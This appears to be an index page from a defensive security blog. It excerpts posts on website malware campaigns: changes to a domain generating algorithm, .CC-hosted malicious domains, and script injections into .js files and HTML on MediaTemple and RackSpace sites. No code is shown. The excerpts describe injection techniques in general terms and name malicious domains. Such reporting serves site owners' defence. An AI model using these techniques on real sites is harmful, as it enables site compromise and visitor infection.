A few days ago Jindrich Kubec (Avast) pinged me that the RunForestRun malware changed the domain generating algorithm (DGA) and now uses waw.pl subdomains (instead of .ru) in malicious URLs.
I decided to take a look at the new scripts and found quite a few very interesting changes. This post will be about those changes.
It was a massive infection and many webmasters asked me to help them clean up their sites. I told them how to search for various pattern of malicious files and asked them to provide me with access logs and samples of the malicious code they found on their servers.
At first the hack looked quite mysterious:
The mystery was solved when I got access to one of the infected sites.
According to the Betteridge’s Law of Headlines “Any headline which ends in a question mark can be answered by the word ‘no’“. Nonetheless, I use this type of a headline for this post because this was the question I asked myself when I came across the following attack.
A couple of years ago I wrote about malware attacks that used Twitter API to generate domain names for their malicious sites using trending topics as keys in the domain generating algorithm.
Since 2009, I’ve seen many revisions of that attack. It has never been the most prevalent issue but as far as I can tell it constantly evolves and mutates. The recent update of the malicious script injected by this attack looked quite interesting and I decided to find out what has changed since late 2009.
During the last few days I’ve noticed an increased number of websites that redirect search traffic to ciscotred .cz .cc. The typical Unmask Parasites report looks like this:
A few days ago I tweeted that “this year the most popular TLD for malicious sites is .CC“. I conducted some research on the most prevalent attacks that use the .CC TLD and now want to elaborate on what is going on.
Today, I can see many blacklisted sites where Google report one of the following three domains as a source of the problem:
Malicious software is hosted on 1 domain(s), including medien-verlag.de/.
The attack is quite interesting so I decided to share results of my initial investigation here.
Two of the major trends in malware attacks described on this blog this summer were the use of hijacked DNS records of legitimate domains and continuous attacks against sites on MediaTemple and RackSpace. In the end of this September, I noticed a new attack that combined these two trends.
At higher level, this attack is no different from many preceding variations that hit MediaTemple. It prepends malicious code to the first line of some existing .js files or injects it inside the <ads>…</ads> tags at the bottom of HTML code of legitimate web pages.
However, soon you notice new techniques.
This is a short post about one of the ongoing attacks. It injects the following script [usually] at the very bottom of the HTML
A few days ago I noticed a new mass infection of sites on RackSpace. It mostly affects WordPress blogs and sites hosted under the same account with WordPress blogs.
Hackers create malicious .js files in some subdirectory of the compromised sites and inject links to those .js files into website pages.
Occasional posts from the developer ofUnmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.
This blog in the news